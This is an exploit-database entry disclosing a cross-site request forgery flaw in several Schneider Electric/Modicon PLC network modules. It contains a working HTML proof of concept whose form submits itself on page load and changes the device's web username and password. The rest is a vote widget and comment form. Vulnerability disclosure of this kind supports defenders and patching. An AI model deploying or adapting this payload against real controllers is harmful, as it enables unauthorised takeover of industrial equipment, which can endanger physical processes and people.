Schneider Electric/Modicon PLC - CSRF Vulnerability

2018.05.22
hk t4rkd3vilz (HK) hk
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Schneider Electric/Modicon PLC - CSRF Vulnerability # Date: 2018-05-18 # Exploit Author: t4rkd3vilz # Vendor Homepage: http://www.schneider-electric.com/ # Version: BMXNOC0401, BMXNOE0100, BMXNOE0110, BMXNOE0110H, BMXNOR0200H, BMXP342020, BMXP342020H, BMXP342030, BMXP3420302, BMXP3420302H, and BMXP342030H. # Tested on: Windows 8 OS and Chrome Explorer # Greetz: Jameel Nabbo # PoC <html> <head> <title>CSRF POC</title> </head> <body> <form action="http://TargetAdress/secure/embedded/builtin?Language=undefined&user=USERNAME&passwd=PASSWORD&cnfpasswd=PASSWORD&subhttppwd=Change+Password" method="get"> </form> <script> document.forms[0].submit(); </script> </body> </html>


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top